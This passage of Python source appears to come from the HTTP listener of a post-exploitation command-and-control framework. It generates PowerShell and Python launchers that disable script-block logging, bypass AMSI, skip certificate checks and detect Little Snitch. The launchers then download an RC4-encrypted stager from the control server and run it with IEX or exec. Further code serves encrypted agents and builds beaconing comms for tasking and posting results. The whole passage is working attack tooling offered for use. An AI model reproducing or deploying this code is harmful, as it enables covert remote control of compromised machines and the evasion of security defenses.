listenerOptions['DefaultProfile']['Value'] uris = [a for a in profile.split('|')[0].split(',')] stage0 = random.choice(uris) customHeaders = profile.split('|')[2:] cookie = listenerOptions['Cookie']['Value'] # generate new cookie if the current session cookie is empty to avoid empty cookie if create multiple listeners if cookie == '': generate = self.generate_cookie() listenerOptions['Cookie']['Value'] = generate cookie = generate if language.startswith('po'): # PowerShell stager = '$ErrorActionPreference = \"SilentlyContinue\";' if safeChecks.lower() == 'true': stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){") # ScriptBlock Logging bypass stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPF")+"=[ref].Assembly.GetType(") stager += "'System.Management.Automation.Utils'" stager += helpers.randomize_capitalization(").\"GetFie`ld\"(") stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'" stager += helpers.randomize_capitalization(");If($"+helpers.generate_random_script_var_name("GPF")+"){$"+helpers.generate_random_script_var_name("GPC")+"=$"+helpers.generate_random_script_var_name("GPF")+".GetValue($null);If($"+helpers.generate_random_script_var_name("GPC")+"") stager += "['ScriptB'+'lockLogging']" stager += helpers.randomize_capitalization("){$"+helpers.generate_random_script_var_name("GPC")+"") stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;" stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPC")+"") stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}" stager += helpers.randomize_capitalization("$val=[Collections.Generic.Dictionary[string,System.Object]]::new();$val.Add") stager += "('EnableScriptB'+'lockLogging',0);" stager += helpers.randomize_capitalization("$val.Add") stager += "('EnableScriptBlockInvocationLogging',0);" stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPC")+"") stager += "['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']" stager += helpers.randomize_capitalization("=$val}") stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(") stager += "'signatures','N'+'onPublic,Static'" stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}};") # AMSI bypass stager += '$p6="iInitFai";$p1="System.Management";$p5="ams";$p4="iUtils";$p7="led";$p3="on.Ams";$p8="NonPub";$p9="lic,Stat";' stager += '$p10="ic";$p11=$null;$p12=$true;$p2=".Automati";[Ref].Assembly.GetType($p1+$p2+$p3+$p4).GetField($p5+$p6+$p7,$p8+$p9+$p10)' stager += '.SetValue($p11,$p12);' stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;") stager += helpers.randomize_capitalization("$" + helpers.generate_random_script_var_name("wc") + "= New-Object System.Net.WebClient;") if userAgent.lower() == 'default': profile = listenerOptions['DefaultProfile']['Value'] userAgent = profile.split('|')[1] stager += "$u='"+userAgent+"';" if 'https' in host: # allow for self-signed certificates for https connections stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};" if userAgent.lower() != 'none': stager += helpers.randomize_capitalization('$' + helpers.generate_random_script_var_name("wc") + '.Headers.Add(') stager += "'User-Agent',$u);" if userAgent.lower() != 'none': stager += helpers.randomize_capitalization('$'+helpers.generate_random_script_var_name("wc")+'.Headers.Add(') stager += "'User-Agent',$u);" if proxy.lower() != 'none': if proxy.lower() == 'default': stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy=[System.Net.WebRequest]::DefaultWebProxy;") else: # TODO: implement form for other proxy stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('") stager += proxy.lower() stager += helpers.randomize_capitalization("');") stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy = $proxy;") if proxyCreds.lower() != 'none': if proxyCreds.lower() == "default": stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;") else: # TODO: implement form for other proxy credentials username = proxyCreds.split(':')[0] password = proxyCreds.split(':')[1] if len(username.split('\\')) > 1: usr = username.split('\\')[1] domain = username.split('\\')[0] stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');" else: usr = username.split('\\')[0] stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"');" stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy.Credentials = $netcred;") #save the proxy settings to use during the entire staging process and the agent stager += "$Script:Proxy = $"+helpers.generate_random_script_var_name("wc")+".Proxy;" # TODO: reimplement stager retries? #check if we're using IPv6 listenerOptions = copy.deepcopy(listenerOptions) bindIP = listenerOptions['BindIP']['Value'] port = listenerOptions['Port']['Value'] if ':' in bindIP: if "http" in host: if "https" in host: host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port) else: host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port) # code to turn the key string into a byte array stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(") stager += "'%s');" % (stagingKey) # this is the minimized RC4 stager code from rc4.ps1 stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};') # prebuild the request routing packet for the launcher routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='') b64RoutingPacket = base64.b64encode(routingPacket) stager += "$ser="+helpers.obfuscate_call_home_address(host)+";$t='"+stage0+"';" #Add custom headers if any if customHeaders != []: for header in customHeaders: headerKey = header.split(':')[0] headerValue = header.split(':')[1] #If host header defined, assume domain fronting is in use and add a call to the base URL first #this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello if headerKey.lower() == "host": stager += helpers.randomize_capitalization("try{$ig=$"+helpers.generate_random_script_var_name("wc")+".DownloadData($ser)}catch{};") stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(") stager += "\"%s\",\"%s\");" % (headerKey, headerValue) # add the RC4 packet to a cookie stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(") stager += "\"Cookie\",\"%s=%s\");" % (cookie, b64RoutingPacket) stager += helpers.randomize_capitalization("$data=$"+helpers.generate_random_script_var_name("wc")+".DownloadData($ser+$t);") stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];") # decode everything and kick it over to IEX to kick off execution stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX") if obfuscate: stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand) # base64 encode the stager and return it if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())): return helpers.powershell_launcher(stager, launcher) else: # otherwise return the case-randomized stager return stager if language.startswith('py'): # Python launcherBase = 'import sys;' if "https" in host: # monkey patch ssl woohooo launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n" try: if safeChecks.lower() == 'true': launcherBase += "import re, subprocess;" launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n" launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n" launcherBase += "out, err = ps.communicate()\n" launcherBase += "if re.search(\"Little Snitch\", out):\n" launcherBase += " sys.exit()\n" except Exception as e: p = "[!] Error setting LittleSnitch in stager: " + str(e) print helpers.color(p, color='red') if userAgent.lower() == 'default': profile = listenerOptions['DefaultProfile']['Value'] userAgent = profile.split('|')[1] launcherBase += "import urllib2;\n" launcherBase += "UA='%s';" % (userAgent) launcherBase += "server='%s';t='%s';" % (host, stage0) # prebuild the request routing packet for the launcher routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='') b64RoutingPacket = base64.b64encode(routingPacket) launcherBase += "req=urllib2.Request(server+t);\n" # add the RC4 packet to a cookie launcherBase += "req.add_header('User-Agent',UA);\n" launcherBase += "req.add_header('Cookie',\"%s=%s\");\n" % (cookie,b64RoutingPacket) # Add custom headers if any if customHeaders != []: for header in customHeaders: headerKey = header.split(':')[0] headerValue = header.split(':')[1] #launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue) launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue) if proxy.lower() != "none": if proxy.lower() == "default": launcherBase += "proxy = urllib2.ProxyHandler();\n" else: proto = proxy.split(':')[0] launcherBase += "proxy = urllib2.ProxyHandler({'"+proto+"':'"+proxy+"'});\n" if proxyCreds != "none": if proxyCreds == "default": launcherBase += "o = urllib2.build_opener(proxy);\n" else: launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n" username = proxyCreds.split(':')[0] password = proxyCreds.split(':')[1] launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n" launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n" else: launcherBase += "o = urllib2.build_opener(proxy);\n" else: launcherBase += "o = urllib2.build_opener();\n" #install proxy and creds globally, so they can be used with urlopen. launcherBase += "urllib2.install_opener(o);\n" # download the stager and extract the IV launcherBase += "a=urllib2.urlopen(req).read();\n" launcherBase += "IV=a[0:4];" launcherBase += "data=a[4:];" launcherBase += "key=IV+'%s';" % (stagingKey) # RC4 decryption launcherBase += "S,j,out=range(256),0,[]\n" launcherBase += "for i in range(256):\n" launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n" launcherBase += " S[i],S[j]=S[j],S[i]\n" launcherBase += "i=j=0\n" launcherBase += "for char in data:\n" launcherBase += " i=(i+1)%256\n" launcherBase += " j=(j+S[i])%256\n" launcherBase += " S[i],S[j]=S[j],S[i]\n" launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n" launcherBase += "exec(''.join(out))" if encode: launchEncoded = base64.b64encode(launcherBase) launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | /usr/bin/python &" % (launchEncoded) return launcher else: return launcherBase else: print helpers.color("[!] listeners/http generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module.") else: print helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!") def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None): """ Generate the stager code needed for communications with this listener. """ if not language: print helpers.color('[!] listeners/http generate_stager(): no language specified!') return None profile = listenerOptions['DefaultProfile']['Value'] uris = [a.strip('/') for a in profile.split('|')[0].split(',')] launcher = listenerOptions['Launcher']['Value'] stagingKey = listenerOptions['StagingKey']['Value'] workingHours = listenerOptions['WorkingHours']['Value'] killDate = listenerOptions['KillDate']['Value'] host = listenerOptions['Host']['Value'] customHeaders = profile.split('|')[2:] # select some random URIs for staging from the main profile stage1 = random.choice(uris) stage2 = random.choice(uris) if language.lower() == 'powershell': # read in the stager base f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath)) stager = f.read() f.close() # make sure the server ends with "/" if not host.endswith("/"): host += "/" #Patch in custom Headers remove = [] if customHeaders != []: for key in customHeaders: value = key.split(":") if 'cookie' in value[0].lower() and value[1]: continue remove += value headers = ','.join(remove) #headers = ','.join(customHeaders) stager = stager.replace("$customHeaders = \"\";","$customHeaders = \""+headers+"\";") #patch in working hours, if any if workingHours != "": stager = stager.replace('WORKING_HOURS_REPLACE', workingHours) #Patch in the killdate, if any if killDate != "": stager = stager.replace('REPLACE_KILLDATE', killDate) # patch the server and key information stager = stager.replace('REPLACE_SERVER', host) stager = stager.replace('REPLACE_STAGING_KEY', stagingKey) stager = stager.replace('index.jsp', stage1) stager = stager.replace('index.php', stage2) randomizedStager = '' for line in stager.split("\n"): line = line.strip() # skip commented line if not line.startswith("#"): # randomize capitalization of lines without quoted strings if "\"" not in line: randomizedStager += helpers.randomize_capitalization(line) else: randomizedStager += line if obfuscate: randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand) # base64 encode the stager and return it if encode: return helpers.enc_powershell(randomizedStager) elif encrypt: RC4IV = os.urandom(4) return RC4IV + encryption.rc4(RC4IV+stagingKey, randomizedStager) else: # otherwise just return the case-randomized stager return randomizedStager elif language.lower() == 'python': template_path = [ os.path.join(self.mainMenu.installPath, '/data/agent/stagers'), os.path.join(self.mainMenu.installPath, './data/agent/stagers')] eng = templating.TemplateEngine(template_path) template = eng.get_template('http.py') template_options = { 'working_hours': workingHours, 'kill_date': killDate, 'staging_key': stagingKey, 'profile': profile, 'stage_1': stage1, 'stage_2': stage2 } stager = template.render(template_options) stager = obfuscation.py_minify(stager) # base64 encode the stager and return it if encode: return base64.b64encode(stager) if encrypt: # return an encrypted version of the stager ("normal" staging) RC4IV = os.urandom(4) return RC4IV + encryption.rc4(RC4IV+stagingKey, stager) else: # otherwise return the standard stager return stager else: print helpers.color("[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.") def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""): """ Generate the full agent code needed for communications with this listener. """ if not language: print helpers.color('[!] listeners/http generate_agent(): no language specified!') return None language = language.lower() delay = listenerOptions['DefaultDelay']['Value'] jitter = listenerOptions['DefaultJitter']['Value'] profile = listenerOptions['DefaultProfile']['Value'] lostLimit = listenerOptions['DefaultLostLimit']['Value'] killDate = listenerOptions['KillDate']['Value'] workingHours = listenerOptions['WorkingHours']['Value'] b64DefaultResponse = base64.b64encode(self.default_response()) if language == 'powershell': f = open(self.mainMenu.installPath + "./data/agent/agent.ps1") code = f.read() f.close() # patch in the comms methods commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language) code = code.replace('REPLACE_COMMS', commsCode) # strip out comments and blank lines code = helpers.strip_powershell_comments(code) # patch in the delay, jitter, lost limit, and comms profile code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay)) code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter)) code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"") code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit)) code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+str(b64DefaultResponse)+'"') # patch in the killDate and workingHours if they're specified if killDate != "": code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',") if obfuscate: code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand) return code elif language == 'python': f = open(self.mainMenu.installPath + "./data/agent/agent.py") code = f.read() f.close() # patch in the comms methods commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language) code = code.replace('REPLACE_COMMS', commsCode) # strip out comments and blank lines code = helpers.strip_python_comments(code) # patch in the delay, jitter, lost limit, and comms profile code = code.replace('delay = 60', 'delay = %s' % (delay)) code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter)) code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile)) code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit)) code = code.replace('defaultResponse = base64.b64decode("")', 'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse)) # patch in the killDate and workingHours if they're specified if killDate != "": code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate)) if workingHours != "": code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate)) return code else: print helpers.color("[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.") def generate_comms(self, listenerOptions, language=None): """ Generate just the agent communication code block needed for communications with this listener. This is so agents can easily be dynamically updated for the new listener. """ if language: if language.lower() == 'powershell': updateServers = """ $Script:ControlServers = @("%s"); $Script:ServerIndex = 0; """ % (listenerOptions['Host']['Value']) if listenerOptions['Host']['Value'].startswith('https'): updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};" getTask = """ $script:GetTask = { try { if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) { # meta 'TASKING_REQUEST' : 4 $RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4 $RoutingCookie = [Convert]::ToBase64String($RoutingPacket) # build the web request object $"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient # set the proxy settings for the WC to be the default system settings $"""+helpers.generate_random_script_var_name("wc")+""".Proxy = [System.Net.WebRequest]::GetSystemWebProxy(); $"""+helpers.generate_random_script_var_name("wc")+""".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials; if($Script:Proxy) { $"""+helpers.generate_random_script_var_name("wc")+""".Proxy = $Script:Proxy; } $"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("User-Agent",$script:UserAgent) $script:Headers.GetEnumerator() | % {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)} $"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("Cookie",\"""" + self.session_cookie + """=$RoutingCookie") # choose a random valid URI for checkin $taskURI = $script:TaskURIs | Get-Random $result = $"""+helpers.generate_random_script_var_name("wc")+""".DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI) $result } } catch [Net.WebException] { $script:MissedCheckins += 1 if ($_.Exception.GetBaseException().Response.statuscode -eq 401) { # restart key negotiation Start-Negotiate -S "$ser" -SK $SK -UA $ua } } } """ sendMessage = """ $script:SendMessage = { param($Packets) if($Packets) { # build and encrypt the response packet $EncBytes = Encrypt-Bytes $Packets # build the top level RC4 "routing packet" # meta 'RESULT_POST' : 5 $RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5 if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) { # build the web request object $"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient # set the proxy settings for the WC to be the default system settings $"""+helpers.generate_random_script_var_name("wc")+""".Proxy = [System.Net.WebRequest]::GetSystemWebProxy(); $"""+helpers.generate_random_script_var_name("wc")+""".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials; if($Script:Proxy) { $"""+helpers.generate_random_script_var_name("wc")+""".Proxy = $Script:Proxy; } $"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add('User-Agent', $Script:UserAgent) $Script:Headers.GetEnumerator() | ForEach-Object {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)} try { # get a random posting URI $taskURI = $Script:TaskURIs | Get-Random $response = $"""+helpers.generate_random_script_var_name("wc")+""".UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket); } catch [System.Net.WebException]{ # exception posting data... if ($_.Exception.GetBaseException().Response.statuscode -eq 401) { # restart key negotiation Start-Negotiate -S "$ser" -SK $SK -UA $ua } } } } } """ return updateServers + getTask + sendMessage elif language.lower() == 'python': updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value']) if listenerOptions['Host']['Value'].startswith('https'): updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None" sendMessage = """ def send_message(packets=None): # Requests a tasking or posts data to a randomized tasking URI. # If packets == None, the agent GETs a tasking from the control server. # If packets != None, the agent encrypts the passed packets and # POSTs the data to the control server. global missedCheckins global server global headers global taskURIs data = None if packets: data = ''.join(packets) # aes_encrypt_then_hmac is in stager.py encData = aes_encrypt_then_hmac(key, data) data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData) else: # if we're GETing taskings, then build the routing packet to stuff info a cookie first. # meta TASKING_REQUEST = 4 routingPacket = build_routing_packet(stagingKey, sessionID, meta=4) b64routingPacket = base64.b64encode(routingPacket) headers['Cookie'] = \"""" + self.session_cookie + """=%s" % (b64routingPacket) taskURI = random.sample(taskURIs, 1)[0] requestUri = server + taskURI try: data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read() return ('200', data) except urllib2.HTTPError as HTTPError: # if the server is reached, but returns an erro (like 404) missedCheckins = missedCheckins + 1 #if signaled for restaging, exit. if HTTPError.code == 401: sys.exit(0) return (HTTPError.code, '') except urllib2.URLError as URLerror: # if the server cannot be reached missedCheckins = missedCheckins + 1 return (URLerror.reason, '') return ('', '') """ return updateServers + sendMessage else: print helpers.color("[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.") else: print helpers.color('[!] listeners/http generate_comms(): no language specified!') def start_server(self, listenerOptions): """ Threaded function that actually starts up the Flask server. """ # make a copy of the currently set listener options for later stager/agent generation listenerOptions = copy.deepcopy(listenerOptions) # suppress the normal Flask output log = logging.getLogger('werkzeug') log.setLevel(logging.ERROR) bindIP = listenerOptions['BindIP']['Value'] host = listenerOptions['Host']['Value'] port = listenerOptions['Port']['Value'] stagingKey = listenerOptions['StagingKey']['Value'] stagerURI = listenerOptions['StagerURI']['Value'] userAgent = self.options['UserAgent']['Value'] listenerName = self.options['Name']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] app = Flask(__name__) self.app = app @app.route('/download/<stager>') def send_stager(stager): if 'po' in stager: launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) return launcher elif 'py' in stager: launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) return launcher else: return make_response(self.default_response(), 404) @app.route('/wp-admin/<domain>/<username>/<hostname>', methods=['GET']) def check_agent(domain,username,hostname): """ Check if an active agent already exists for a particular user, on a particular host. """ username = domain + "\\" + username result = self.mainMenu.agents.get_agents_by_username_host(username, hostname) if result: # Powershell base64 encoded command: "exit;" return "ZQB4AGkAdAA7AAoA" else: launcher = self.mainMenu.stagers.generate_launcher(listenerName,language='powershell', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) launcher = helpers.enc_powershell(launcher) return launcher @app.before_request def check_ip(): """ Before every request, check if the IP address is allowed. """ if not self.mainMenu.agents.is_ip_allowed(request.remote_addr): listenerName = self.options['Name']['Value'] message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) return make_response(self.default_response(), 404) @app.after_request def change_header(response): "Modify the headers response server." headers = listenerOptions['Headers']['Value'] for key in headers.split("|"): value = key.split(":") response.headers[value[0]] = value[1] return response @app.after_request def add_proxy_headers(response): "Add HTTP headers to avoid proxy caching." response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate" response.headers['Pragma'] = "no-cache" response.headers['Expires'] = "0" return response @app.route('/') @app.route('/index.html') def serve_index(): """ Return default server web page if user navigates to index. """ static_dir = self.mainMenu.installPath + "data/misc/" return make_response(self.index_page(), 200) @app.route('/welcome.png') def serve_index_helper(): """ Serves image loaded by index page. """ static_dir = self.mainMenu.installPath + "data/misc/" return send_from_directory(static_dir, 'welcome.png') @app.route('/<path:request_uri>', methods=['GET']) def handle_get(request_uri): """ Handle an agent GET request. This is used during the first step of the staging process, and when the agent requests taskings. """ clientIP = request.remote_addr listenerName = self.options['Name']['Value'] message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) routingPacket = None cookie = request.headers.get('Cookie') if cookie and cookie != '': try: # see if we can extract the 'routing packet' from the specified cookie location # NOTE: this can be easily moved to a paramter, another cookie value, etc. if self.session_cookie in cookie: listenerName = self.options['Name']['Value'] message = "[*] GET cookie value from {} : {}".format(clientIP, cookie) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) cookieParts = cookie.split(';') for part in cookieParts: if part.startswith(self.session_cookie): base64RoutingPacket = part[part.find('=')+1:] # decode the routing packet base64 value in the cookie routingPacket = base64.b64decode(base64RoutingPacket) except Exception as e: routingPacket = None pass if routingPacket: # parse the routing packet and process the results dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions, clientIP) if dataResults and len(dataResults) > 0: for (language, results) in dataResults: if results: if results == 'STAGE0': # handle_agent_data() signals that the listener should return the stager.ps1 code # step 2 of negotiation -> return stager.ps1 (stage 1) listenerName = self.options['Name']['Value'] message = "[*] Sending {} stager (stage 1) to {}".format(language, clientIP) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) stage = self.generate_stager(language=language, listenerOptions=listenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand) return make_response(stage, 200) elif results.startswith('ERROR:'): listenerName = self.options['Name']['Value'] message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(request_uri, clientIP, results) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) if 'not in cache' in results: # signal the client to restage print helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP)) return make_response(self.default_response(), 401) else: return make_response(self.default_response(), 200) else: # actual taskings listenerName = self.options['Name']['Value'] message = "[*] Agent from {} retrieved taskings".format(clientIP) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) return make_response(results, 200) else: # dispatcher.send("[!] Results are None...", sender='listeners/http') return make_response(self.default_response(), 200) else: return make_response(self.default_response(), 200) else: listenerName = self.options['Name']['Value'] message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) return make_response(self.default_response(), 200) @app.route('/<path:request_uri>', methods=['POST']) def handle_post(request_uri): """ Handle an agent POST request. """ stagingKey = listenerOptions['StagingKey']['Value'] clientIP = request.remote_addr requestData = request.get_data() listenerName = self.options['Name']['Value'] message = "[*] POST request data length from {} : {}".format(clientIP, len(requestData)) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) # the routing packet should be at the front of the binary request.data # NOTE: this can also go into a cookie/etc. dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP) if dataResults and len(dataResults) > 0: for (language, results) in dataResults: if results: if results.startswith('STAGE2'): # TODO: document the exact results structure returned if ':' in clientIP: clientIP = '[' + str(clientIP) + ']' sessionID = results.split(' ')[1].strip() sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey'] listenerName = self.options['Name']['Value'] message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) hopListenerName = request.headers.get('Hop-Name') try: hopListener = helpers.get_listener_options(hopListenerName) tempListenerOptions = copy.deepcopy(listenerOptions) tempListenerOptions['Host']['Value'] = hopListener['Host']['Value'] except TypeError: tempListenerOptions = listenerOptions # step 6 of negotiation -> server sends patched agent.ps1/agent.py agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand) encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode) # TODO: wrap ^ in a routing packet? return make_response(encryptedAgent, 200) elif results[:10].lower().startswith('error') or results[:10].lower().startswith('exception'): listenerName = self.options['Name']['Value'] message = "[!] Error returned for results by {} : {}".format(clientIP, results) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) return make_response(self.default_response(), 404) elif results == 'VALID': listenerName = self.options['Name']['Value'] message = "[*] Valid results returned by {}".format(clientIP) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) return make_response(self.default_response(), 404) else: return make_response(results, 200) else: return make_response(self.default_response(), 404) else: return make_response(self.default_response(), 404) try: certPath = listenerOptions['CertPath']['Value'] host = listenerOptions['Host']['Value'] if certPath.strip() != '' and host.startswith('https'): certPath = os.path.abspath(certPath) pyversion = sys.version_info # support any version of tls pyversion = sys.version_info if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13: proto = ssl.PROTOCOL_TLS elif pyversion[0] >= 3: proto = ssl.PROTOCOL_TLS else: proto = ssl.PROTOCOL_SSLv23 context = ssl.SSLContext(proto) context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath)) app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context) else: app.run(host=bindIP, port=int(port), threaded=True) except Exception as e: print helpers.color("[!] Listener startup on port %s failed: %s " % (port, e)) listenerName = self.options['Name']['Value'] message = "[!] Listener startup on port {} failed: {}".format(port, e) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) def start(self, name=''): """ Start a threaded instance of self.start_server() and store it in the self.threads dictionary keyed by the listener name. """ listenerOptions = self.options if name and name != '': self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,)) self.threads[name].start() time.sleep(1) # returns True if the listener successfully started, false otherwise return self.threads[name].is_alive() else: name = listenerOptions['Name']['Value'] self.threads[name] = helpers.KThread(target=self.start_server, 